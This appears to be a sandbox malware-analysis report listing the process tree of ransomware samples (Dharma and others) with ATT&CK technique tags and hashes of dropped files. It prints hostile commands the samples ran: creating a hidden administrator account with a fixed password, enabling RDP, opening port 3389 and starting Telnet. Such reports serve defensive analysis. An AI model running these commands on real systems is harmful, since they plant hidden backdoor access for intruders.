                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe" /w0000021C
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        PID:18676
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe" /w0000021C
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        PID:18988
                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:7764
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        PID:7772
                                                                                                                                                                                    • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\Dharma.exe
                                                                                                                                                                                      "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\Dharma.exe"
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                      PID:7460
                                                                                                                                                                                      • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\ac\nc123.exe
                                                                                                                                                                                        "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\ac\nc123.exe"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Enumerates connected drives
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        PID:2580
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:1600
                                                                                                                                                                                      • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\ac\mssql.exe
                                                                                                                                                                                        "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\ac\mssql.exe"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Sets service image path in registry
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Impair Defenses: Safe Mode Boot
                                                                                                                                                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                        • Suspicious behavior: LoadsDriver
                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                        PID:552
                                                                                                                                                                                      • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\ac\mssql2.exe
                                                                                                                                                                                        "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\ac\mssql2.exe"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                        PID:5624
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\ac\Shadow.bat" "
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        PID:7368
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\ac\systembackup.bat" "
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        PID:1520
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:7308
                                                                                                                                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                            WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                            PID:3848
                                                                                                                                                                                          • C:\Windows\SysWOW64\find.exe
                                                                                                                                                                                            Find "="
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                            PID:7012
                                                                                                                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                                                                                                                          net user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:7156
                                                                                                                                                                                          • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                            C:\Windows\system32\net1 user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                            PID:7500
                                                                                                                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                                                                                                                          net localgroup Administrators systembackup /add
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:400
                                                                                                                                                                                          • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                            C:\Windows\system32\net1 localgroup Administrators systembackup /add
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                            PID:5644
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:1148
                                                                                                                                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                            WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                            PID:7128
                                                                                                                                                                                          • C:\Windows\SysWOW64\find.exe
                                                                                                                                                                                            Find "="
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                            PID:5324
                                                                                                                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                                                                                                                          net localgroup "Remote Desktop Users" systembackup /add
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Remote Service Session Hijacking: RDP Hijacking
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:5740
                                                                                                                                                                                          • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                            C:\Windows\system32\net1 localgroup "Remote Desktop Users" systembackup /add
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • Remote Service Session Hijacking: RDP Hijacking
                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                            PID:4220
                                                                                                                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                                                                                                                          net accounts /forcelogoff:no /maxpwage:unlimited
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:4364
                                                                                                                                                                                          • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                            C:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                            PID:7340
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:432
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:32
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v systembackup /t REG_DWORD /d 0x0 /f
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Hide Artifacts: Hidden Users
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:5756
                                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                          attrib C:\users\systembackup +r +a +s +h
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Sets file to hidden
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          • Views/modifies file attributes
                                                                                                                                                                                          PID:3032
                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                          netsh firewall add portopening TCP 3389 "Remote Desktop"
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:2928
                                                                                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                          sc config tlntsvr start=auto
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:2096
                                                                                                                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                                                                                                                          net start Telnet
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:6284
                                                                                                                                                                                          • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                            C:\Windows\system32\net1 start Telnet
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                            PID:6504
                                                                                                                                                                                      • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\ac\EVER\SearchHost.exe
                                                                                                                                                                                        "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\ac\EVER\SearchHost.exe"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Enumerates connected drives
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                        PID:1692
                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c C:\Windows\System32\CoronaVirus.exe
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:3736
                                                                                                                                                                                        • C:\Windows\System32\CoronaVirus.exe
                                                                                                                                                                                          C:\Windows\System32\CoronaVirus.exe
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:3988
                                                                                                                                                                                      • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\NoMoreRansom.exe
                                                                                                                                                                                        "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\NoMoreRansom.exe"
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        PID:25052
                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c "C:\ProgramData\Windows\csrss.exe"
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:11140
                                                                                                                                                                                          • C:\ProgramData\Windows\csrss.exe
                                                                                                                                                                                            C:\ProgramData\Windows\csrss.exe
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                            PID:11020
                                                                                                                                                                                        • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                          C:\Windows\system32\vssvc.exe
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:11212
                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c mshta.exe "C:\Windows\System32\Info.hta"
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:11524
                                                                                                                                                                                              • C:\Windows\system32\mshta.exe
                                                                                                                                                                                                mshta.exe "C:\Windows\System32\Info.hta"
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:12284
                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c mshta.exe "C:\Users\Admin\AppData\Roaming\Info.hta"
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:11532
                                                                                                                                                                                                  • C:\Windows\system32\mshta.exe
                                                                                                                                                                                                    mshta.exe "C:\Users\Admin\AppData\Roaming\Info.hta"
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:11728
                                                                                                                                                                                                  • C:\Windows\system32\werfault.exe
                                                                                                                                                                                                    werfault.exe /h /shared Global\ace63bfd04484cda91b12c5f722d813e /t 11724 /p 11728
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:12152
                                                                                                                                                                                                    • C:\Windows\system32\werfault.exe
                                                                                                                                                                                                      werfault.exe /h /shared Global\6d74a38f94b844f2b1f6adce6ffd5b73 /t 11484 /p 11480
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:12684
                                                                                                                                                                                                      • C:\Windows\system32\NOTEPAD.EXE
                                                                                                                                                                                                        "C:\Windows\system32\NOTEPAD.EXE" C:\FILES ENCRYPTED.txt
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:13192
                                                                                                                                                                                                        • C:\Windows\system32\werfault.exe
                                                                                                                                                                                                          werfault.exe /h /shared Global\b2bcc81594824eada3bf22dde6ba06fb /t 12424 /p 12284
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:14828
                                                                                                                                                                                                          • C:\Windows\system32\taskmgr.exe
                                                                                                                                                                                                            "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                            • Drops startup file
                                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                            • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                            PID:16044
                                                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:17124
                                                                                                                                                                                                            • C:\Windows\notepad.exe
                                                                                                                                                                                                              "C:\Windows\notepad.exe"
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:18208
                                                                                                                                                                                                              • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                                                                C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                PID:18248
                                                                                                                                                                                                              • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                                                                C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                PID:20516
                                                                                                                                                                                                              • C:\Windows\sysmon.exe
                                                                                                                                                                                                                "C:\Windows\sysmon.exe"
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:20224
                                                                                                                                                                                                                • C:\Windows\splwow64.exe
                                                                                                                                                                                                                  "C:\Windows\splwow64.exe"
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:20104
                                                                                                                                                                                                                  • C:\Windows\regedit.exe
                                                                                                                                                                                                                    "C:\Windows\regedit.exe"
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Runs regedit.exe
                                                                                                                                                                                                                    PID:20024
                                                                                                                                                                                                                  • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                                                                    C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                    PID:19872
                                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                                    "C:\Windows\explorer.exe"
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:18308
                                                                                                                                                                                                                    • C:\Windows\bfsvc.exe
                                                                                                                                                                                                                      "C:\Windows\bfsvc.exe"
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:18360
                                                                                                                                                                                                                      • C:\Windows\system32\taskmgr.exe
                                                                                                                                                                                                                        "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:18420
                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                          explorer.exe
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                          • Boot or Logon Autostart Execution: Active Setup
                                                                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                          PID:19212
                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                          PID:19588
                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                          explorer.exe
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                          • Boot or Logon Autostart Execution: Active Setup
                                                                                                                                                                                                                          • Drops desktop.ini file(s)
                                                                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                          PID:19852
                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                          PID:23572
                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                          PID:20256
                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                          explorer.exe
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                          • Boot or Logon Autostart Execution: Active Setup
                                                                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                          PID:21224
                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                          PID:23236
                                                                                                                                                                                                                        • C:\Windows\system32\sihost.exe
                                                                                                                                                                                                                          sihost.exe
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:20896
                                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                                              explorer.exe /LOADSAVEDWINDOWS
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                              • Boot or Logon Autostart Execution: Active Setup
                                                                                                                                                                                                                              • Enumerates connected drives
                                                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                              PID:22548
                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                            PID:22048
                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                            PID:21780
                                                                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                            PID:24520
                                                                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:24192
                                                                                                                                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                              C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:24940
                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                PID:25532
                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                PID:25220

                                                                                                                                                                                                                              Network

                                                                                                                                                                                                                              MITRE ATT&CK Enterprise v16

                                                                                                                                                                                                                              Replay Monitor

                                                                                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                                                                                              Downloads

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\metadata

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                114B

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                bd39464f45270f02a2ed4b3087f6d57a

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                7cb75d52b1046bf711c73f43e49e8069f3e9b04e

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                7e40091ad7bd9ef0090a78a948192e41199fbaf85ea96f30dadb9c42e5bfb11f

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                577bba68b0d10773d8093e8e632455bb4476e01c34ece2ed8780bff5a0bb6cae512b30794fe413cde69d77fcd8e06e6c87554f60172f1d5861b059ee6b125790

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\reports\c4de462a-5083-416c-b51f-e58684f28f5c.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                185KB

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                0f950151a7e6db612879a19a4a521a58

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                3a3349b81c11da1efa5e0508400d05e6b29cc32c

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                4e704e7b6f41c335a9ff642d166a9dce06397f9db7dedbf95813eb65f1c679e7

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                924bbaa06b7db744860bfae7de28961f482a4f04918846ba270609ae8a8a8d21f8f57fbb9cea47c7f852daaa213416513485ec73809dd988aeaa7bc75fd5ddd6

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                414B

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                d28553a77e3581095e84bd5c93703cd1

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                3ea714ad697151aa473ebada8aa4f1912824b1f5

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                2c7faee23373da916f002e8eb8150c2a53d35b33ef1816687387108e26970a81

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                3a798ef41d4213e88347360ef085ad175d6dc5d266117676d8f3b8dba8557b4b036655299dd7131c0b8dbad7ed9fde26ed1b143b3762e0bf657b8899dab10b41

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000003

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                49KB

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                454dbaea6069ee3f7891857e12cc7501

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                925a86583804c24b93289ca072bf7c557090d64e

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                bd9bfbad4af10b2c7d81d626b2f10085c930bdd5d0f7ab7b292e139d46fae005

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                a62d9833213f5c26c0dc04074f946f94a3f928b5cb0f7f77555518047a0f8c26533fe730fe7b6c032e5179d1d06529d05e388076987b58c50501c260ad4b6335

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000005

                                                                                                                                                                                                                                Filesize

